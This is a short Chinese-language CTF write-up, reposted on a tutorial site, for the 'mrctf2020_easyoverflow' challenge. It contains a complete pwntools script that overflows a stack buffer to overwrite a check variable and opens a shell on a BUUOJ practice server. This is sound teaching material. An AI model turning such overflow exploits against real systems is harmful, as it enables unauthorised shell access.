C/C++教程

mrctf2020_easyoverflow

本文主要是介绍mrctf2020_easyoverflow,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

mrctf2020_easyoverflow

查看保护
请添加图片描述
请添加图片描述
有个溢出,可以覆盖掉v5。v5等于n0t_r3@11y_f1@g即可get_shell。所以溢出改v5就行。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26447)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

p1 = b'a' * 0x30 + b'n0t_r3@11y_f1@g'

r.sendline(p1)

r.interactive()
这篇关于mrctf2020_easyoverflow的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!